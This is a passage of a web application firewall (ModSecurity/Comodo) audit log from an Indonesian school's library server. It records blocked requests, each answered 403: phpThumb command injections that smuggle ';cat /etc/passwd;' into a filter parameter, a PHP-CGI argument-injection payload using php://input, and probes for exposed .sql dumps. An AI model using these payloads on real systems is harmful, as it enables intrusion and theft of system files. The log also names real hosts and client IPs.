"/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172985478165 1725 (- - -) Stopwatch2: 1747172985478165 1725; combined=554, p1=386, p2=131, p3=0, p4=0, p5=37, sr=88, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad6a0b32-Z-- --d0fc9a47-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLxQAAAIU 103.236.140.4 50622 103.236.140.4 8181 --d0fc9a47-B-- GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276025 --d0fc9a47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d0fc9a47-E-- --d0fc9a47-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987078254 1696 (- - -) Stopwatch2: 1747172987078254 1696; combined=576, p1=412, p2=138, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0fc9a47-Z-- --4bea2b06-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLxgAAAIc 103.236.140.4 50622 103.236.140.4 8181 --4bea2b06-B-- GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876412 --4bea2b06-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4bea2b06-E-- --4bea2b06-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987278381 1704 (- - -) Stopwatch2: 1747172987278381 1704; combined=543, p1=382, p2=130, p3=0, p4=0, p5=31, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bea2b06-Z-- --ac3a9666-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLxwAAAIY 103.236.140.4 50622 103.236.140.4 8181 --ac3a9666-B-- GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276028 --ac3a9666-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ac3a9666-E-- --ac3a9666-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987477134 1749 (- - -) Stopwatch2: 1747172987477134 1749; combined=571, p1=410, p2=130, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac3a9666-Z-- --1986ac5f-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLyAAAAIg 103.236.140.4 50622 103.236.140.4 8181 --1986ac5f-B-- GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876415 --1986ac5f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1986ac5f-E-- --1986ac5f-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987676900 2189 (- - -) Stopwatch2: 1747172987676900 2189; combined=651, p1=462, p2=147, p3=0, p4=0, p5=41, sr=80, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1986ac5f-Z-- --d9406c46-A-- [14/May/2025:04:49:47 +0700] aCO-e8abX6K9rhby1vhLyQAAAIo 103.236.140.4 50622 103.236.140.4 8181 --d9406c46-B-- GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276031 --d9406c46-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d9406c46-E-- --d9406c46-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172987877979 1601 (- - -) Stopwatch2: 1747172987877979 1601; combined=520, p1=362, p2=128, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9406c46-Z-- --e4efb620-A-- [14/May/2025:04:49:48 +0700] aCO-fMabX6K9rhby1vhLygAAAIk 103.236.140.4 50622 103.236.140.4 8181 --e4efb620-B-- GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 146876418 --e4efb620-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e4efb620-E-- --e4efb620-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172988076263 1665 (- - -) Stopwatch2: 1747172988076263 1665; combined=559, p1=392, p2=128, p3=0, p4=0, p5=38, sr=71, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e4efb620-Z-- --133c4631-A-- [14/May/2025:04:49:48 +0700] aCO-fMabX6K9rhby1vhLywAAAIw 103.236.140.4 50622 103.236.140.4 8181 --133c4631-B-- GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Cookie: X-Forwarded-For: 146.190.167.107 Accept-Encoding: gzip X-Varnish: 147276034 --133c4631-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --133c4631-E-- --133c4631-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747172988276540 1746 (- - -) Stopwatch2: 1747172988276540 1746; combined=544, p1=383, p2=130, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --133c4631-Z-- --d2a5436e-A-- [14/May/2025:05:06:25 +0700] aCPCYV1ltXwOneQqchOtgAAAAAM 103.236.140.4 50936 103.236.140.4 8181 --d2a5436e-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 218.250.231.191 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 218.250.231.191 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --d2a5436e-C-- --d2a5436e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2a5436e-E-- --d2a5436e-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747173985453181 4811 (- - -) Stopwatch2: 1747173985453181 4811; combined=3033, p1=464, p2=2532, p3=0, p4=0, p5=36, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2a5436e-Z-- --f5566121-A-- [14/May/2025:06:45:51 +0700] aCPZrzMGvM3GPb0-SyRVbgAAAEY 103.236.140.4 35224 103.236.140.4 8181 --f5566121-B-- GET /prod.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.231.102.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.231.102.51 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --f5566121-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5566121-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179951497519 2135 (- - -) Stopwatch2: 1747179951497519 2135; combined=699, p1=332, p2=344, p3=0, p4=0, p5=22, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5566121-Z-- --d6f56344-A-- [14/May/2025:06:45:53 +0700] aCPZsV1ltXwOneQqchOy9gAAAAc 103.236.140.4 35324 103.236.140.4 8181 --d6f56344-B-- GET /wordpress_f.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.231.102.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.231.102.51 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --d6f56344-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6f56344-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179953929977 2839 (- - -) Stopwatch2: 1747179953929977 2839; combined=1046, p1=474, p2=536, p3=0, p4=0, p5=35, sr=108, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6f56344-Z-- --135f2648-A-- [14/May/2025:06:45:56 +0700] aCPZtF1ltXwOneQqchOzBAAAAAY 103.236.140.4 35446 103.236.140.4 8181 --135f2648-B-- GET /wordpress_.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.231.102.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.231.102.51 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --135f2648-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --135f2648-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179956908880 2132 (- - -) Stopwatch2: 1747179956908880 2132; combined=738, p1=327, p2=374, p3=0, p4=0, p5=36, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --135f2648-Z-- --b12b2b1c-A-- [14/May/2025:06:45:59 +0700] aCPZt8OlTOX2TmGW6__2xAAAAMo 103.236.140.4 35540 103.236.140.4 8181 --b12b2b1c-B-- GET /main_wordpress.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.149.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.149.88 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --b12b2b1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b12b2b1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179959209546 2479 (- - -) Stopwatch2: 1747179959209546 2479; combined=919, p1=423, p2=468, p3=0, p4=0, p5=28, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b12b2b1c-Z-- --247ee844-A-- [14/May/2025:06:46:00 +0700] aCPZuMOlTOX2TmGW6__20AAAANU 103.236.140.4 35604 103.236.140.4 8181 --247ee844-B-- GET /WP.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 176.65.149.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 176.65.149.88 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --247ee844-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --247ee844-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747179960763881 2104 (- - -) Stopwatch2: 1747179960763881 2104; combined=757, p1=366, p2=365, p3=0, p4=0, p5=25, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --247ee844-Z-- --a0eae474-A-- [14/May/2025:06:46:01 +0700] aCPZuTMGvM3GPb0-SyRVngAAAEw 103.236.140.4 35630 103.236.140.4 8181 --a0eae474-B-- GET /unnamed-file.wp.sql HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 185.220.101.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.220.101.12 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Mobile Safari/537.36 Accept: */* --a0eae474-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0eae474-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: 